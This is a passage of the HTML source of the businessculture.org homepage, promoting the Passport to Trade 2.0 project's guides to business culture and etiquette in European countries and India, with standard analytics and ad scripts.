href='https://businessculture.org/wp-content/themes/twentythirteen/genericons/genericons.css?ver=3.03' type='text/css' media='all' /> <link rel='stylesheet' id='twentythirteen-style-css' href='https://businessculture.org/wp-content/themes/2013-child-pptt/style.css?ver=2013-07-18' type='text/css' media='all' /> <link rel='stylesheet' id='twentythirteen-block-style-css' href='https://businessculture.org/wp-content/themes/twentythirteen/css/blocks.css?ver=2018-10-18' type='text/css' media='all' /> <!--[if lt IE 9]> <link rel='stylesheet' id='twentythirteen-ie-css' href='https://businessculture.org/wp-content/themes/twentythirteen/css/ie.css?ver=2013-07-18' type='text/css' media='all' /> <![endif]--> <script type='text/javascript' src='https://businessculture.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://businessculture.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://businessculture.org/wp-content/plugins/language-bar-flags/js/tooltip.slide.js?ver=5.0.3'></script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script> <link rel='https://api.w.org/' href='https://businessculture.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://businessculture.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://businessculture.org/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://businessculture.org/' /> <link rel="alternate" type="application/json+oembed" href="https://businessculture.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbusinessculture.org%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://businessculture.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbusinessculture.org%2F&#038;format=xml" /> <!-- This site is powered by Tweet, Like, Plusone and Share Plugin - http://techxt.com/tweet-like-google-1-and-share-plugin-wordpress/ --> <meta property="og:type" content="article" /> <meta property="og:title" content="International Business Culture and Business Etiquette" /> <meta property="og:url" content="https://businessculture.org/"/> <meta property="og:site_name" content="Business Culture" /> <meta property="og:description" content="Are you a Small or Medium-sized Enterprise (SME) or a student thinking of successfully establishing yourself in another European country and require assistance "/> <!--[if lt IE 9]> <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <meta property="og:image" content="https://businessculture.org/wp-content/uploads/2013/05/business-culture-europe-flags-map1.gif" /> <style type="text/css">div.socialicons{float:left;display:block;margin-right: 10px;line-height: 1;}div.socialiconsv{line-height: 1;}div.socialicons p{margin-bottom: 0px !important;margin-top: 0px !important;padding-bottom: 0px !important;padding-top: 0px !important;}div.social4iv{background: none repeat scroll 0 0 #FFFFFF;border: 1px solid #aaa;border-radius: 3px 3px 3px 3px;box-shadow: 3px 3px 3px #DDDDDD;padding: 3px;position: fixed;text-align: center;top: 55px;width: 68px;display:none;}div.socialiconsv{padding-bottom: 5px;}</style> <style type="text/css" id="twentythirteen-header-css"> .site-header { background: url(https://businessculture.org/wp-content/themes/twentythirteen/images/headers/circle.png) no-repeat scroll top; background-size: 1600px auto; } @media (max-width: 767px) { .site-header { background-size: 768px auto; } } @media (max-width: 359px) { .site-header { background-size: 360px auto; } } </style> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-27744900-1', 'businessculture.org'); ga('require', 'displayfeatures'); ga('require', 'linkid', 'linkid.js'); ga('send', 'pageview'); </script> </head> <body data-rsssl=1 class="home page-template-default page page-id-1017 wp-embed-responsive sidebar"> <div id="page" class="hfeed site"> <header id="masthead" class="site-header" role="banner"> <a href="https://businessculture.org/"><img src="/wp-content/themes/2013-child-pptt/images/business_culture_logo.gif" alt="Business Culture from Passport to Trade 2.0" /></a> <div id = "msgbar"> This site offers free and <a href="/shop">paid for</a> business culture guides and - please complete this <a href="https://businessculture.org/blog/2014/07/20/imrove-businessculture-org-website/" target="_blank">short survey</a> to help us improve, Thank you!</div> <div id="navbar" class="navbar"> <nav id="site-navigation" class="navigation main-navigation" role="navigation"> <h3 class="menu-toggle">Menu</h3> <a class="screen-reader-text skip-link" href="#content" title="Skip to content">Skip to content</a> <div class="menu-pptt-container"><ul id="menu-pptt" class="nav-menu"><li id="menu-item-1007" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1007"><a href="https://businessculture.org/passport-to-trade-2-0/">About</a> <ul class="sub-menu"> <li id="menu-item-12479" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12479"><a href="/shop">Purchase guides</a></li> <li id="menu-item-993" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-993"><a href="https://businessculture.org/passport-to-trade-2-0/blog-2/">Blog</a></li> <li id="menu-item-1003" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1003"><a href="https://businessculture.org/passport-to-trade-2-0/benefits-of-cultural-awareness/">Benefits</a></li> <li id="menu-item-999" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-999"><a href="https://businessculture.org/passport-to-trade-2-0/business-advisory-board/">Advisors</a></li> <li id="menu-item-1001" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1001"><a href="https://businessculture.org/passport-to-trade-2-0/project-partners/">Partnership</a></li> <li id="menu-item-1005" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1005"><a href="https://businessculture.org/passport-to-trade-2-0/history-leonardo-da-vinci-program/">History</a></li> <li id="menu-item-997" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-997"><a href="https://businessculture.org/passport-to-trade-2-0/project-library/">Library</a></li> <li id="menu-item-11337" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11337"><a href="https://businessculture.org/passport-to-trade-2-0/business-culture-com-testimonials/">Testimonials</a></li> <li id="menu-item-9647" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9647"><a href="https://businessculture.org/passport-to-trade-2-0/sitemap/">Sitemap</a></li> <li id="menu-item-995" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-995"><a href="https://businessculture.org/passport-to-trade-2-0/european-research-centers/">Contact</a></li> </ul> </li> <li id="menu-item-1055" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1055"><a href="https://businessculture.org/business-culture/">Business Culture</a> <ul class="sub-menu"> <li id="menu-item-1109" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1109"><a href="https://businessculture.org/business-culture/what-is-social-networking/">Social Networking</a> <ul class="sub-menu"> <li id="menu-item-1137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1137"><a href="https://businessculture.org/business-culture/what-is-social-networking/top-social-media-sites/">Top Social Media Sites for Business</a></li> <li id="menu-item-1135" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1135"><a href="https://businessculture.org/business-culture/what-is-social-networking/social-media-marketing-strategy-template/">Social Media Marketing Strategy template</a></li> </ul> </li> <li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a href="https://businessculture.org/business-culture/what-is-international-business/">What is International Business?</a></li> <li id="menu-item-1077" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1077"><a href="https://businessculture.org/business-culture/cultural-differences-in-business/">Cultural differences in business</a></li> <li id="menu-item-1139" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1139"><a href="https://businessculture.org/business-culture/why-work-study-abroad/">Why Work or Study Abroad?</a></li> <li id="menu-item-1099" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1099"><a href="https://businessculture.org/business-culture/business-etiquette/">Business Etiquette</a></li> </ul> </li> <li id="menu-item-1211" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1211"><a href="https://businessculture.org/northern-europe/">Northern Europe</a> <ul class="sub-menu"> <li id="menu-item-11821" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11821"><a href="https://businessculture.org/northern-europe/denmark-business-culture/">Denmark</a></li> <li id="menu-item-3753" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3753"><a href="https://businessculture.org/northern-europe/sweden/">Sweden</a></li> <li id="menu-item-2553" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2553"><a href="https://businessculture.org/northern-europe/finland/">Finland</a></li> <li id="menu-item-11823" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11823"><a href="https://businessculture.org/northern-europe/iceland/">Iceland</a></li> <li id="menu-item-11825" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11825"><a href="https://businessculture.org/northern-europe/ireland/">Ireland</a></li> <li id="menu-item-2393" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2393"><a href="https://businessculture.org/northern-europe/uk-business-culture/">United Kingdom</a></li> </ul> </li> <li id="menu-item-11873" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-11873"><a href="https://businessculture.org/southern-europe/">Southern Europe</a> <ul class="sub-menu"> <li id="menu-item-11853" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11853"><a href="https://businessculture.org/southern-europe/business-culture-in-croatia/">Croatia</a></li> <li id="menu-item-11855" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11855"><a href="https://businessculture.org/southern-europe/business-culture-in-cyprus/">Cyprus</a></li> <li id="menu-item-11857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11857"><a href="https://businessculture.org/southern-europe/former-yugoslav-republic-of-macedonia-fyrom/">Former Yugoslav Republic of Macedonia (FYROM)</a></li> <li id="menu-item-11859" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11859"><a href="https://businessculture.org/southern-europe/business-culture-in-greece/">Greece</a></li> <li id="menu-item-11861" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11861"><a href="https://businessculture.org/southern-europe/business-culture-in-italy/">Italy</a></li> <li id="menu-item-11863" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11863"><a href="https://businessculture.org/southern-europe/business-culture-in-malta/">Malta</a></li> <li id="menu-item-11865" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11865"><a href="https://businessculture.org/southern-europe/business-culture-in-portugal/">Portugal</a></li> <li id="menu-item-11867" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11867"><a href="https://businessculture.org/southern-europe/business-culture-in-slovenia/">Slovenia</a></li> <li id="menu-item-11869" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11869"><a href="https://businessculture.org/southern-europe/business-culture-in-spain/">Spain</a></li> <li id="menu-item-11871" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11871"><a href="https://businessculture.org/southern-europe/business-culture-in-turkey/">Turkey</a></li> </ul> </li> <li id="menu-item-1219" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1219"><a href="https://businessculture.org/eastern-europe/">Eastern Europe</a> <ul class="sub-menu"> <li id="menu-item-11827" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11827"><a href="https://businessculture.org/eastern-europe/bulgaria/">Bulgaria</a></li> <li id="menu-item-11829" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11829"><a href="https://businessculture.org/eastern-europe/estonia/">Estonia</a></li> <li id="menu-item-11831" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11831"><a href="https://businessculture.org/eastern-europe/latvia/">Latvia</a></li> <li id="menu-item-11833" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11833"><a href="https://businessculture.org/eastern-europe/lithuania/">Lithuania</a></li> <li id="menu-item-4061" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4061"><a href="https://businessculture.org/eastern-europe/hungary/">Hungary</a></li> <li id="menu-item-11837" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11837"><a href="https://businessculture.org/eastern-europe/czech-republic/">The Czech Republic</a></li> <li id="menu-item-4109" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4109"><a href="https://businessculture.org/eastern-europe/slovakia/">The Slovak Republic</a></li> <li id="menu-item-4077" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4077"><a href="https://businessculture.org/eastern-europe/poland/">Poland</a></li> <li id="menu-item-11835" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11835"><a href="https://businessculture.org/eastern-europe/romania/">Romania</a></li> </ul> </li> <li id="menu-item-11839" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-11839"><a href="https://businessculture.org/western-europe/">Western Europe</a> <ul class="sub-menu"> <li id="menu-item-11841" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11841"><a href="https://businessculture.org/western-europe/business-culture-in-austria/">Austria</a></li> <li id="menu-item-11843" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11843"><a href="https://businessculture.org/western-europe/business-culture-in-belgium/">Belgium</a></li> <li id="menu-item-11845" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11845"><a href="https://businessculture.org/western-europe/business-culture-in-france/">France</a></li> <li id="menu-item-11847" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11847"><a href="https://businessculture.org/western-europe/business-culture-in-germany/">Germany</a></li> <li id="menu-item-11849" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11849"><a href="https://businessculture.org/western-europe/business-culture-in-luxembourg/">Luxembourg</a></li> <li id="menu-item-11851" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11851"><a href="https://businessculture.org/western-europe/business-culture-in-netherlands/">The Netherlands</a></li> </ul> </li> <li id="menu-item-12263" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12263"><a href="https://businessculture.org/indian-business-culture/">India</a></li> </ul></div> <form role="search" method="get" class="search-form" action="https://businessculture.org/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form> </nav><!-- #site-navigation --> </div><!-- #navbar --> </header><!-- #masthead --> <div id="main" class="site-main"> <div id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <article id="post-1017" class="post-1017 page type-page status-publish hentry"> <header class="entry-header"> <h1 class="entry-title">International Business Culture and Business Etiquette</h1> </header><!-- .entry-header --> <div class="entry-content"> <div class="social4i" style="height:29px;"> <div class="social4in" style="height:29px;float: left;"> <div class="socialicons s4twitter" style="float:left;margin-right: 10px;"><a href="https://twitter.com/share" data-url="https://businessculture.org/" data-counturl="https://businessculture.org/" data-text="International Business Culture and Business Etiquette" class="twitter-share-button" data-count="horizontal" data-via="Passport2Trade"></a></div> <div class="socialicons s4fblike" style="float:left;margin-right: 10px;"> <div class="fb-like" data-href="https://businessculture.org/" data-send="false" data-layout="button_count" data-width="100" data-height="21" data-show-faces="false"></div> </div> <div class="socialicons s4plusone" style="float:left;margin-right: 10px;"> <div class="g-plusone" data-size="medium" data-href="https://businessculture.org/"></div> </div> <div class="socialicons s4linkedin" style="float:left;margin-right: 10px;"><script type="in/share" data-url="https://businessculture.org/" data-counter="right"></script></div> </div> <div style="clear:both"></div> </div> <p>Are you a Small or Medium-sized Enterprise (SME) or a student thinking of successfully establishing yourself in another European country and require assistance with <a href="https://businessculture.org/business-culture/cultural-differences-in-business/">cultural difference in business</a>? If so, businessculture.org is here to help! The Passport to Trade 2.0 project brings you extensive training in <a href="https://businessculture.org/business-culture/what-is-international-business/">international business</a> culture awareness and <a href="https://businessculture.org/business-culture/business-etiquette/">business etiquette</a>.</p> <p><a href="https://businessculture.org/passport-to-trade-2-0/">Passport to Trade 2.0</a> is a multiple award winning resource (<a title="European Search Award 2014" href="http://www.salford.ac.uk/business-school/about-salford-business-school/salford-business-school-news/salford-business-school-wins-european-award-for-best-use-of-online-search">European Search Award 2014</a>, <a title="Big Chip Little Chip Award 2014" href="http://www.salford.ac.uk/business-school/about-salford-business-school/salford-business-school-news/salford-business-school-wins-award-for-free-online-training-course-that-helps-smes-export">Big Chip Little Chip 2014</a>), it provides up to date business culture knowledge to help you with your <a href="https://businessculture.org/blog/2013/09/18/how-to-use-social-media-for-business/">social media marketing</a> in 31 countries. This will enable you to engage more effectively with new business opportunities and help SMEs expand into new territories. Students also get an opportunity to access free resources to inform their <a href="https://businessculture.org/business-culture/why-work-study-abroad/">work &amp; study placements abroad</a>.</p> <h2>Countries studied as part of this project are:</h2> <p><a href="https://businessculture.org/wp-content/uploads/2013/05/business-culture-europe-flags-map1.gif"><img class="alignnone size-full wp-image-10853" src="https://businessculture.org/wp-content/uploads/2013/05/business-culture-europe-flags-map1.gif" alt="business-culture-europe-flags-map1" usemap="#Map" width="604" height="503" /></a></p> <map id="Map" name="Map"> <area title="Business Culture in Denmark" alt="Business Culture in Denmark" coords="195,230,225,254" shape="rect" href="https://businessculture.org/northern-europe/denmark-business-culture/" /> <area title="Business Culture in Slovenia" alt="Business Culture in Slovenia" coords="228,347,263,366" shape="rect" href="https://businessculture.org/southern-europe/business-culture-in-slovenia/" /> <area title="Business Culture in Croatia" alt="Business Culture in Croatia" coords="263,343,298,362" shape="rect" href="https://businessculture.org/southern-europe/business-culture-in-croatia/" /> <area title="Business Culture in Cyprus" alt="Business Culture in Cyprus" coords="443,447,473,471" shape="rect" href="https://businessculture.org/southern-europe/business-culture-in-cyprus/" /> <area title="Business Culture in Hungary" alt="Business Culture in Hungary" coords="274,319,308,339" shape="rect" href="https://businessculture.org/eastern-europe/hungary" /> <area title="Business Culture in Austria" alt="Business Culture in Austria" coords="238,320,268,344" shape="rect" href="https://businessculture.org/western-europe/business-culture-in-austria/" /> <area title="Business Culture in Lithuania" alt="Business Culture in Lithuania" coords="300,216,330,240" shape="rect" href="https://businessculture.org/eastern-europe/lithuania/" /> <area title="Business Culture in Romania" alt="Business Culture in Romania" coords="323,328,371,362" shape="rect" href="https://businessculture.org/eastern-europe/romania/" /> <area title="Business Culture in Poland" alt="Business Culture in Poland" coords="256,250,312,285" shape="rect" href="https://businessculture.org/eastern-europe/poland/" /> <area title="Business Culture in Slovakia" alt="Business Culture in Slovakia" coords="278,294,308,318" shape="rect" href="https://businessculture.org/eastern-europe/slovakia/" /> <area title="Business Culture in Latvia" alt="Business Culture in Latvia" coords="295,195,330,214" shape="rect" href="https://businessculture.org/eastern-europe/latvia/" /> <area title="Business Culture in Turkey" alt="Business Culture in Turkey" coords="383,379,484,438" shape="rect" href="https://businessculture.org/southern-europe/business-culture-in-turkey/" /> <area title="Business Culture in Bulgaria" alt="Business Culture in Bulgaria" coords="348,371,378,395" shape="rect" href="https://businessculture.org/eastern-europe/bulgaria/" /> <area title="Business Culture in Former Yugoslav Republic of Macedonia (FYROM)" alt="Business Culture in FYROM" coords="316,392,346,416" shape="rect" href="https://businessculture.org/southern-europe/former-yugoslav-republic-of-macedonia-fyrom/" /> <area title="Business Culture in Greece" alt="Business Culture in Greece" coords="320,422,368,488" shape="rect" href="https://businessculture.org/eastern-europe/business-culture-in-greece" /> <area title="Business Culture in Malta" alt="Business Culture in Malta" coords="252,476,282,500" shape="rect" href="https://businessculture.org/eastern-europe/business-culture-in-malta" /> <area title="Business Culture in Italy" alt="Business Culture in Italy" coords="225,388,279,430" shape="rect" href="https://businessculture.org/eastern-europe/business-culture-in-italy/" /> <area title="Business Culture in the Czech Republic" alt="Business Culture in the Czech Republic" coords="238,294,268,318" shape="rect" href="https://businessculture.org/eastern-europe/czech-republic/" /> <area title="Business Culture in Germany" alt="Business Culture in Germany" coords="195,260,229,302" shape="rect" href="https://businessculture.org/western-europe/business-culture-in-germany" /> <area title="Business Culture in Belgium" alt="Business Culture in Belgium" coords="157,283,187,307" shape="rect" href="https://businessculture.org/western-europe/business-culture-in-belgium/" /> <area title="Business Culture in Netherlands" alt="Business Culture in the Netherlands" coords="163,256,193,280" shape="rect" href="https://businessculture.org/western-europe/business-culture-in-netherlands/" /> <area title="Business Culture in France" alt="Business Culture in France" coords="109,315,171,383" shape="rect" href="https://businessculture.org/southern-europe/business-culture-in-france/" /> <area title="Business Culture in Spain" alt="Business Culture in Spain" coords="58,386,101,455" shape="rect" href="https://businessculture.org/southern-europe/business-culture-in-spain/" /> <area title="Business Culture in the United Kingdom of Great Britain and Northern Ireland, commonly known as the United Kingdom, Great Britain, or Britain" alt="British Business Culture" coords="96,185,145,291" shape="rect" href="https://businessculture.org/northern-europe/uk-business-culture/" /> <area title="Business Culture in Estonia" alt="Business Culture in Estonia" coords="304,171,334,195" shape="rect" href="https://businessculture.org/northern-europe/estonia/" /> <area title="Business Culture in Finland" alt="Business Culture in Finland" coords="292,77,325,156" shape="rect" href="https://businessculture.org/northern-europe/finland/" /> <area title="Business Culture in Portugal" alt="Business Culture in Portugal" coords="4,391,36,442" shape="rect" href="https://businessculture.org/southern-europe/business-culture-in-portugal/" /> <area title="Business Culture in Ireland" alt="Business Culture in Ireland" coords="48,235,85,267" shape="rect" href="https://businessculture.org/northern-europe/ireland/" /> <area title="Business Culture in Iceland" alt="Business Culture in Iceland" coords="20,41,88,105" shape="rect" href="https://businessculture.org/northern-europe/iceland/" /> <area title="Business Culture in Sweden" alt="Business Culture in Sweden" coords="233,99,267,221" shape="rect" href="https://businessculture.org/northern-europe/sweden/" /> <area title="Business Culture in Luxembourg" alt="Business Culture in Luxembourg" coords="175,305,206,326" shape="rect" href="https://businessculture.org/western-europe/business-culture-in-luxembourg/" /> </map> <div> <div style="float: left; width: 50%;"> <h2>Northern Europe</h2> <ul> <li><span style="line-height: 19px;"><a href="https://businessculture.org/northern-europe/denmark-business-culture/" target="_blank" rel="noopener">Denmark</a></span></li> <li><span style="line-height: 19px;"><a href="https://businessculture.org/northern-europe/finland/">Finland</a> </span></li> <li><span style="line-height: 19px;"><a href="https://businessculture.org/northern-europe/ireland/">Ireland</a></span></li> <li><span style="line-height: 19px;"><a href="https://businessculture.org/northern-europe/iceland/">Iceland</a></span></li> <li><span style="line-height: 19px;"><a href="https://businessculture.org/northern-europe/sweden/">Sweden</a></span></li> <li><span style="line-height: 19px;"><a href="https://businessculture.org/northern-europe/uk-business-culture/">United Kingdom </a></span></li> </ul> </div> <div style="float: right; width: 50%;"> <h2>Western Europe</h2> <ul> <li><a href="https://businessculture.org/western-europe/business-culture-in-austria/">Austria</a></li> <li><a title="Belgium" href="https://businessculture.org/western-europe/business-culture-in-belgium/">Belgium</a></li> <li><a href="https://businessculture.org/western-europe/business-culture-in-france/">France</a></li> <li><a href="https://businessculture.org/western-europe/business-culture-in-germany/">Germany</a></li> <li><a href="https://businessculture.org/western-europe/business-culture-in-luxembourg/">Luxembourg</a></li> <li><a href="https://businessculture.org/western-europe/business-culture-in-netherlands/">Netherlands</a></li> </ul> </div> </div> <div> <div style="float: left; width: 50%;"> <h2>Eastern Europe</h2> <ul> <li><span style="line-height: 19px;"><strong><a href="https://businessculture.org/eastern-europe/czech-republic/">Czech Republic</a></strong></span></li> <li><strong><a href="https://businessculture.org/eastern-europe/estonia/">Estonia</a></strong></li> <li><span style="line-height: 19px;"><strong><a href="https://businessculture.org/eastern-europe/hungary/">Hungary</a></strong></span></li> <li><span style="line-height: 19px;"><strong><a href="https://businessculture.org/eastern-europe/poland/">Poland</a></strong></span></li> <li><span style="line-height: 19px;"><strong><a href="https://businessculture.org/eastern-europe/slovakia/">Slovak Republic</a></strong></span></li> <li><span style="line-height: 19px;"><span style="line-height: 19px;"><strong><a href="https://businessculture.org/eastern-europe/bulgaria/">Bulgaria</a></strong></span></span></li> <li><strong><a href="https://businessculture.org/eastern-europe/latvia/">Latvia</a></strong></li> <li><strong><a href="https://businessculture.org/eastern-europe/lithuania/">Lithuania</a></strong></li> <li><span style="line-height: 19px;"><strong><a href="https://businessculture.org/eastern-europe/romania/">Romania</a></strong></span></li> </ul> </div> <div style="float: right; width: 50%;"> <h2>Southern Europe</h2> <ul> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-greece/">Greece</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-italy/">Italy</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-malta/">Malta</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-portugal/">Portugal</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-croatia/">Croatia</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/former-yugoslav-republic-of-macedonia-fyrom/">Macedonia</a></strong><a href="https://businessculture.org/southern-europe/former-yugoslav-republic-of-macedonia-fyrom/"> (FYROM)</a></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-slovenia/">Slovenia</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-spain/">Spain</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-turkey/">Turkey</a></strong></li> <li><strong><a href="https://businessculture.org/southern-europe/business-culture-in-cyprus/">Cyprus</a></strong></li> </ul> </div> </div> <div><a href="https://businessculture.org/wp-content/uploads/2013/06/cropped-default-logo.png"><img class="alignnone size-full wp-image-2147" src="https://businessculture.org/wp-content/uploads/2013/06/cropped-default-logo.png" alt="Business Culture project logo - Passport to Trade 2.0" width="235" height="100" /></a></div> <div></div> <div> <p><strong>Business culture guides</strong> are available in 9 languages: &#8211; <a href="https://businessculture.org/">English</a>, <a href="https://businessculture.org/de/">German</a>, <a href="https://businessculture.org/fr/">French</a>, <a href="https://businessculture.org/bu/">Bulgarian</a>, <a href="https://businessculture.org/cz/">Czech</a>, <a href="https://businessculture.org/fi/">Finnish</a>, <a href="https://businessculture.org/gr/">Greek</a>, <a href="https://businessculture.org/it/">Italian</a> and <a href="https://businessculture.org/ro/">Romanian</a>. We have also just released our new <a href="https://businessculture.org/indian-business-culture/">Indian Business Culture</a> guide.</p> <p>Use <a href="http://www.google.com/translate?hl=en&amp;sl=auto&amp;tl=ar&amp;u=http%3A%2F%2Fbusinessculture.org" target="_blank" rel="noopener">Google Translate Tool</a> for automatic translation of <a title="Business Culture in Europe" href="https://businessculture.org">businessculture.org</a> into 70+ other languages.</p> </div> <h2>How can you benefit from BusinessCulture.org resources?</h2> <div> <div style="float: left; width: 50%;"> <h3>Benefits for SMEs</h3> <ul> <li>New market opportunities</li> <li>Tailored information for SMEs</li> <li>Find new social media networks</li> <li>Develop social media strategies</li> <li>Netiquette for business</li> </ul> </div> <div style="float: right; width: 50%;"> <h3>Benefits for Students</h3> <ul> <li>Netiquette for employability</li> <li>Work and study ideas</li> <li>Develop your digital profile</li> <li>Finding which country is for you</li> <li>Useful links to resources</li> </ul> </div> </div> <p>Read more about the recognition of Passport to Trade 2.0 project through industry awards:</p> <p><a href="http://www.salford.ac.uk/business-school/about-salford-business-school/salford-business-school-news/salford-business-school-wins-award-for-free-online-training-course-that-helps-smes-export"><img class="alignnone size-full wp-image-11929" src="https://businessculture.org/wp-content/uploads/2013/05/bigchipwinner.gif" alt="Big Chips Awads Winner" width="110" height="126" /></a><a href="http://www.salford.ac.uk/business-school/about-salford-business-school/salford-business-school-news/centre-for-digital-business-wins-digital-entrepreneur-award"><img class="alignnone size-full wp-image-11931" src="https://businessculture.org/wp-content/uploads/2013/05/social-media-communications-awards-2014.jpg" alt="Social Media Communications Awards" width="150" height="171" /></a>   <a href="http://www.salford.ac.uk/business-school/about-salford-business-school/salford-business-school-news/centre-for-digital-business-project-shortlisted-for-the-digitals"><img class="size-full wp-image-11923" src="https://businessculture.org/wp-content/uploads/2013/05/digital-shortlist.png" alt="Digitals shortlisted" width="180" height="60" /></a><a href="http://www.salford.ac.uk/business-school/about-salford-business-school/salford-business-school-news/salford-business-school-wins-european-award-for-best-use-of-online-search"><img class="size-full wp-image-11927 alignleft" src="https://businessculture.org/wp-content/uploads/2013/05/European_Search_award_winner-2014.jpg" alt="European_Search_award_winner-2014" width="110" height="110" /></a></p> </div><!-- .entry-content --> <footer class="entry-meta"> </footer><!-- .entry-meta --> </article><!-- #post --> <div id="comments" class="comments-area"> </div><!-- #comments --> </div><!-- #content --> </div><!-- #primary --> <div id="tertiary" class="sidebar-container" role="complementary"> <div class="sidebar-inner"> <div class="widget-area"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- PPTT --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-0243589595544144" data-ad-slot="9411925298" data-ad-format="auto"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <iframe src="https://rcm-eu.amazon-adsystem.com/e/cm?t=funplace2shop-21&o=2&p=12&l=ur1&category=video&banner=176RYV8RJGTW0BD292G2&f=ifr" width="300" height="250" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0"></iframe> <hr/> <h3 class="widget-title">Recent Posts</h3> <ul class = "recent-posts-5"> <li><a href="https://businessculture.org/blog/2019/01/21/creating-a-successful-business-in-india/" title="Look Creating a successful business in India" >Creating a successful business in India</a> </li> <li><a href="https://businessculture.org/blog/2019/01/21/paris-vs-london-business-and-cultural-differences/" title="Look Paris vs London : Business and cultural differences" >Paris vs London : Business and cultural differences</a> </li> <li><a href="https://businessculture.org/blog/2019/01/21/trouver-logement-londres-colocation/" title="Look Trouver un logement à Londres: colocation, agence, ... que faire ?" >Trouver un logement à Londres: colocation, agence, ... que faire ?</a> </li> <li><a href="https://businessculture.org/blog/2019/01/21/8-tips-find-accommodation-india/" title="Look 8 tips for finding accommodation in India" >8 tips for finding accommodation in India</a> </li> <li><a href="https://businessculture.org/blog/2019/01/21/tour-of-european-luxury-brands/" title="Look Tour of european luxury brands" >Tour of european luxury brands</a> </li> <li><a href="https://businessculture.org/?p=12235" title="Look Is the Social Media bubble about to burst?" >Is the Social Media bubble about to burst?</a> </li> </ul> </aside><aside id="recent-comments-2" 